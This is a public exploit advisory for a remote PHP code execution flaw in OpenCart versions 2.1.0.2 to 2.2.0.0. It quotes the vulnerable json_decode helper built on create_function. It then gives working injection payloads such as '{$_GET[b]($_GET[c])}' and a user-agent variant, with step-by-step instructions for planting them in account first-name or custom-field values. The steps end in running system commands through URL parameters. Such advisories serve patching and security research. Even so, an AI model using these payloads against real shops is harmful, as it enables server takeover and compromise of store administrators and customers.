## # OpenCart json_decode function Remote PHP Code Execution # # Author: Naser Farhadi # Twitter: @naserfarhadi # # Date: 9 April 2016 # Version: 2.1.0.2 to 2.2.0.0 (Latest version) # Vendor Homepage: http://www.opencart.com/ # # Vulnerability: # ------------ # /upload/system/helper/json.php # $match = '/".*?(?<!\\\\)"/'; # $string = preg_replace($match, '', $json); # $string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string); # ... # $function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/ # $return = ($function) ? $function() : null; # ... # return $return; # # Exploit(json_decode): # ------------ # var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}')); # var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}')); # var_dump(json_decode('{"ok":"1"."2"."3"}')); # # Real World Exploit(OpenCart /index.php?route=account/edit) # ------------ # go to http://host/shop_directory/index.php?route=account/edit # fill $_SERVER[HTTP_USER_AGENT] as First Name # /** save it two times **/ # Code execution happens when an admin user visits the administration panel, in this example # admin user sees his user agent as your First Name in Recent Activity :D # # Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/ # ------------ # if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom # user information like extra phone number,... you can directly execute your injected code. # go to http://host/shop_directory/index.php?route=account/edit # fill {$_GET[b]($_GET[c])} as Custom Field value # save it # go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/ # # Note: # ------------ # Exploit only works if PHP JSON extension is not installed. # # Video: https://youtu.be/1Ai09IQK4C0 ##